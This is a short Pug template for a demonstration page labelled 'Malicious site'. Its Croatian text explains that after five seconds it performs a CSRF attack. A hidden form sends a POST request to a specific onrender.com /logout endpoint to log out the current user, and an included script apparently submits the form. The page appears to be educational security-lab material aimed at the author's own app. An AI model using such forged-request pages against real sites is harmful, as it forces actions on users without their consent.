html 
    head 
        style 
            include ../public/css/malicious-site.css
        title Malicious site 
    body 
        h1(class="title") Ova će stranica izvršiti CSRF

        p(class="description") Ova će web aplikacija nakon 5 sekundi izvršiti CSRF. Odnosno, poslati će POST zahtjev na https://security-4aiv.onrender.com/logout što će odjaviti trenutno prijavljenog korisnika (ako je CSRF omogućen).

        form(action="https://security-4aiv.onrender.com/logout" method="post" id="csrf_form")
            input(type="hidden" name="delete" value="1")

        script 
            include ../public/js/malicious-script.js 